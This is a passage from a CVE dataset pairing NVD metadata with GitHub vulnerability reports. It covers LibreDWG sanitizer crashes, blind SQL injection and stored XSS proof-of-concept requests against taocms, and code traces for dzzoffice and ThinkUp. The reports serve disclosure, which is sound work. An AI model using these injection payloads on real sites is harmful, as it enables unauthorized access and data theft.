Writing DXF file ./fuzz_out ERROR: Unhandled VALUE_INT code 0 ASAN:DEADLYSIGNAL ================================================================= ==18068==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf4e7f bp 0x7fffffffc9e0 sp 0x7fffffff8470 T0) ==18068==The signal is caused by a READ memory access. ==18068==Hint: address points to the zero page. #0 0x7ffff4cf4e7e in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1924 #1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312 #2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336 #3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1924 in dxfb_tables_write ==18068==ABORTING ``` # bug 3 in out_dxfb.c:1872 ## Command `./dwg2dxf -o ./fuzz_out -b -y poc3` ## ASAN report ``` ➜ ./dwg2dxf -o ./fuzz_out -b -y poc3 Reading DWG file poc3 Warning: checksum: 0x27c51243 (calculated) mismatch ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128 ERROR: Invalid preview size 18496. Need min. 18496 bits for TF, have 76 for RAY. ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_RC buffer overflow at 13 ERROR: bit_read_BD buffer overflow at 13 >= 13 ERROR: bit_read_BB buffer overflow at 13 >= 13 ERROR: bit_read_BD buffer overflow at 13 >= 13 ERROR: bit_read_BB buffer overflow at 13 >= 13 ERROR: bit_read_BD buffer overflow at 13 >= 13 ERROR: Invalid 3BD vector Warning: check_CRC mismatch 55-71 = 16: 1ECF <=> 9AC1 Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0 Warning: TODO TABLESTYLE r2010+ missing fields Warning: Unstable Class object 503 MATERIAL (0x481) 45/0 Warning: Unstable Class object 503 MATERIAL (0x481) 46/0 Warning: Unstable Class object 503 MATERIAL (0x481) 47/0 Warning: Ignore invalid handleoff (@390) ERROR: bit_read_RC buffer overflow at 174 ERROR: bit_read_RC buffer overflow at 171 ERROR: bit_read_RC buffer overflow at 973 ERROR: bit_read_RC buffer overflow at 284 ERROR: bit_read_RC buffer overflow at 284 ERROR: Some section size or address out of bounds ERROR: Failed to read uncompressed Preview section Warning: Skip empty section 0 AcDb:Template ERROR: Template section not found ERROR: Invalid num_segidx Writing DXF file ./fuzz_out ASAN:DEADLYSIGNAL ================================================================= ==18124==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf068d bp 0x7fffffffc9e0 sp 0x7fffffff8470 T0) ==18124==The signal is caused by a READ memory access. ==18124==Hint: address points to the zero page. #0 0x7ffff4cf068c in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1872 #1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312 #2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336 #3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1872 in dxfb_tables_write ==18124==ABORTING ``` # bug 4 in out_dxfb.c:1944 ## Command `./dwg2dxf -o ./fuzz_out -b -y --as r12 poc4` ## ASAN report ``` ➜ ./dwg2dxf -o ./fuzz_out -b -y --as r12 poc4 Reading DWG file poc4 Warning: checksum: 0x27c51243 (calculated) mismatch ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_RC buffer overflow at 6 ERROR: bit_read_BD buffer overflow at 6 >= 6 ERROR: bit_read_BB buffer overflow at 6 >= 6 ERROR: bit_read_BD buffer overflow at 6 >= 6 ERROR: bit_read_BB buffer overflow at 6 >= 6 ERROR: bit_read_BD buffer overflow at 6 >= 6 ERROR: Invalid 3BD view_target Warning: check_CRC mismatch 73-82 = 9: 89F5 <=> 46F4 Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0 Warning: TODO TABLESTYLE r2010+ missing fields Warning: Unstable Class object 503 MATERIAL (0x481) 45/0 Warning: Unstable Class object 503 MATERIAL (0x481) 46/0 Warning: Unstable Class object 503 MATERIAL (0x481) 47/0 Warning: Ignore invalid handleoff (@390) ERROR: bit_read_RC buffer overflow at 174 ERROR: bit_read_RC buffer overflow at 171 ERROR: bit_read_RC buffer overflow at 973 ERROR: bit_read_RC buffer overflow at 284 ERROR: bit_read_RC buffer overflow at 284 ERROR: Some section size or address out of bounds ERROR: Failed to read uncompressed Preview section Warning: Skip empty section 0 AcDb:Template ERROR: Template section not found ERROR: Invalid num_segidx Writing DXF file ./fuzz_out as r12 ERROR: Unhandled VALUE_INT code 7 ASAN:DEADLYSIGNAL ================================================================= ==18183==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf71e3 bp 0x7fffffffc9c0 sp 0x7fffffff8450 T0) ==18183==The signal is caused by a READ memory access. ==18183==Hint: address points to the zero page. #0 0x7ffff4cf71e2 in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1944 #1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312 #2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336 #3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1944 in dxfb_tables_write ==18183==ABORTING ``` # All poc [poc.zip](https://github.com/LibreDWG/libredwg/files/6074852/poc.zip)
Four NULL dereference in out_dxfb.c
https://api.github.com/repos/LibreDWG/libredwg/issues/324/comments
1
2021-03-03T09:19:26Z
2021-03-03T17:02:46Z
https://github.com/LibreDWG/libredwg/issues/324
820,916,089
324
2,825
CVE-2021-28237
2021-12-02T22:15:08.943
LibreDWG v0.12.3 was discovered to contain a heap-buffer overflow via decode_preR13.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/325" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.3:*:*:*:*:*:*:*", "matchCriteriaId": "EDE60CD4-CABF-4AE6-B8D1-D93460C11445", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/325
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
I found a heap buffer overflow in the current master (8072563). # Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure # Command `./dwgread ./poc` # ASAN report ``` ➜ ./dwgread ./poc ERROR: This version of LibreDWG is only capable of decoding version r13-r2018 (code: AC1012-AC1032) DWG files. We don't decode many entities and no blocks yet. ERROR: offset -39 ERROR: offset -85 ================================================================= ==12538==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000001c8 at pc 0x7ffff29b78be bp 0x7fffffffa8e0 sp 0x7fffffffa8d0 WRITE of size 8 at 0x6120000001c8 thread T0 #0 0x7ffff29b78bd in decode_preR13_section /home/yuan/afl-target/libredwg-asan/src/decode.c:470 #1 0x7ffff2a26e90 in decode_preR13 /home/yuan/afl-target/libredwg-asan/src/decode.c:744 #2 0x7ffff29a43e9 in dwg_decode /home/yuan/afl-target/libredwg-asan/src/decode.c:235 #3 0x7ffff297afa4 in dwg_read_file /home/yuan/afl-target/libredwg-asan/src/dwg.c:253 #4 0x5555555576f3 in main /home/yuan/afl-target/libredwg-asan/programs/dwgread.c:251 #5 0x7ffff1f52bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x5555555562a9 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwgread+0x22a9) Address 0x6120000001c8 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/yuan/afl-target/libredwg-asan/src/decode.c:470 in decode_preR13_section Shadow bytes around the buggy address: 0x0c247fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa =>0x0c247fff8030: fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa 0x0c247fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==12538==ABORTING ``` # POC [poc.zip](https://github.com/LibreDWG/libredwg/files/6080842/poc.zip)
Heap-buffer-overflow in decode_preR13 line 470
https://api.github.com/repos/LibreDWG/libredwg/issues/325/comments
2
2021-03-04T04:20:26Z
2021-03-08T09:50:24Z
https://github.com/LibreDWG/libredwg/issues/325
821,736,833
325
2,826
CVE-2021-25783
2021-12-02T23:15:07.557
Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Article Search.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*", "matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the column administrator admin1 we created: ![1](https://user-images.githubusercontent.com/56290390/103615068-e4454180-4f64-11eb-8e0b-7f7320302a24.png) We click in order and grab packets: ![2](https://user-images.githubusercontent.com/56290390/103615079-e7d8c880-4f64-11eb-8acc-25bbfb4fd1e9.png) ![3](https://user-images.githubusercontent.com/56290390/103615090-ec04e600-4f64-11eb-85c8-7cebff84ec7f.png) There is a SQL blind injection vulnerability in the location of name: ![4](https://user-images.githubusercontent.com/56290390/103615102-f1623080-4f64-11eb-931e-d461bf25c1cf.png) ![5](https://user-images.githubusercontent.com/56290390/103615112-f626e480-4f64-11eb-8d80-bc08e5af3e52.png) POC:/admin/admin.php?name=s%"+and+"sca%"="&cat=0&status=&action=cms&ctrl=lists&submit=%E6%9F%A5%E8%AF%A2
There is SQL blind injection at "Article search"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/5/comments
1
2021-01-05T06:47:47Z
2021-03-03T17:02:31Z
https://github.com/taogogo/taocms/issues/5
778,638,021
5
2,827
CVE-2021-25784
2021-12-02T23:15:07.600
Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Edit Article.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*", "matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the column administrator admin1 we created: ![1](https://user-images.githubusercontent.com/56290390/103614932-9e887900-4f64-11eb-8e9d-b9e0ff3a6166.png) We click in order and grab packets: ![2](https://user-images.githubusercontent.com/56290390/103614938-a34d2d00-4f64-11eb-829a-c92205115445.png) ![3](https://user-images.githubusercontent.com/56290390/103614945-a7794a80-4f64-11eb-968f-e5dce456262f.png) There is a blind SQL injection vulnerability in the location of id: ![4](https://user-images.githubusercontent.com/56290390/103614955-aba56800-4f64-11eb-9e0e-8fd6c1552a08.png) ![5](https://user-images.githubusercontent.com/56290390/103614963-af38ef00-4f64-11eb-857c-f9c2bd1ff4bd.png) ![6](https://user-images.githubusercontent.com/56290390/103614971-b2cc7600-4f64-11eb-8b85-eb867854ef2a.png) poc:/admin/admin.php?action=cms&id=30+and+1=3&ctrl=edit
There is SQL blind injection at "Edit article"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/4/comments
1
2021-01-05T06:45:53Z
2021-03-03T17:02:19Z
https://github.com/taogogo/taocms/issues/4
778,636,941
4
2,828
CVE-2021-25785
2021-12-02T23:15:07.643
Taocms v2.5Beta5 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Management column.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*", "matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/taogogo/taocms/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the column administrator admin1 we created: ![1](https://user-images.githubusercontent.com/56290390/103614682-2b7f0280-4f64-11eb-896d-5f7c1be8c2f8.png) Let's click "add article" on the left: http://target/admin/admin.php?action=frame&ctrl=iframes ![2](https://user-images.githubusercontent.com/56290390/103614699-32a61080-4f64-11eb-99f0-cbeac76ccf3f.png) Wow! ![3](https://user-images.githubusercontent.com/56290390/103614707-38035b00-4f64-11eb-9af7-d91a1c3d28ec.png) POC: /admin/admin.php postData:name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic=&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4
There is a storage type cross site scripting attack at "Management column"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/3/comments
1
2021-01-05T06:42:31Z
2021-03-03T17:02:09Z
https://github.com/taogogo/taocms/issues/3
778,634,917
3
2,829
CVE-2021-43673
2021-12-03T12:15:07.587
dzzoffice 2.02.1_SC_UTF8 is affected by a Cross Site Scripting (XSS) vulnerability in explorerfile.php. The output of the exit function is printed for the user via exit(json_encode($return)).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*", "matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zyx0814/dzzoffice/issues/188
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zyx0814", "dzzoffice" ]
Hello, I would to report for a possible XSS vulnerability. In file "explorerfile.php" ```php // line 22 // the source $sid = empty($_GET['sid']) ? 0 : $_GET['sid'];//id // line 149 $return = array( 'sid' => $sid, 'total' => $total, 'data' => $data ? $data : array(), 'folderdata' => $folderdata ? $folderdata : array(), 'param' => array( 'disp' => $folder['disp'], 'view' => $folder['iconview'], 'page' => $page, 'perpage' => $perpage, 'bz' => $bz, 'total' => $total, 'asc' => $asc, 'keyword' => $keyword, 'localsearch' => $bz ? 1 : 0 ) ); // line 167 // the sink, the output of exit function will be print it for the user. exit(json_encode($return)); ```
Possible XSS vulnerability
https://api.github.com/repos/zyx0814/dzzoffice/issues/188/comments
5
2021-05-14T19:23:58Z
2021-12-08T23:46:03Z
https://github.com/zyx0814/dzzoffice/issues/188
892,179,198
188
2,830
CVE-2021-43674
2021-12-03T13:15:07.603
ThinkUp 2.0-beta.10 is affected by a path manipulation vulnerability in Smarty.class.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkupapp:thinkup:2.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "88947B8D-7E10-4B6F-BF4E-FC55C1F1751D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/ThinkUpLLC/ThinkUp/issues/2289
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ThinkUpLLC", "ThinkUp" ]
Hello, I would like to report for path manipulation vulnerability. The path of the vulnrability: File "Smarty.class.php" line 1714 ```php function _read_file($filename) { if ( file_exists($filename) && is_readable($filename) && ($fd = @fopen($filename, 'rb')) ) { $contents = ''; while (!feof($fd)) { $contents .= fread($fd, 8192); } fclose($fd); // the source return $contents; } else { return false; } } ``` File "core.read-cache-file.php" ```php line 43 // the source will be the returned value from _read_file $params['results'] = $smarty->_read_file($_cache_file); // line 51 $_contents = $params['results']; // line 54 $_cache_info = unserialize(substr($_contents, $_info_start, $_info_len)); //line 73 // the pattern is array_keys here foreach (array_keys($_cache_info['template']) as $_template_dep) { $_params['resource_name'] = $_template_dep; // the source will pass to _fetch_resource_info function if (!$smarty->_fetch_resource_info($_params) || $_cache_info['timestamp'] < $_params['resource_timestamp']) { // template file has changed, regenerate cache return false; } } ``` File "Smarty.class.php" ```php // line 1538 in function _fetch_resource_info $_params = array('resource_name' => $params['resource_name']) ; // line 1544 if ($this->_parse_resource_name($_params)) {..} // line 1620 in function _parse_resource_name // $params is $_params $_resource_name_parts = explode(':', $params['resource_name'], 2); // line 1632 $params['resource_type'] = $_resource_name_parts[0]; // line 1661 $_params = array('type' => $params['resource_type']); 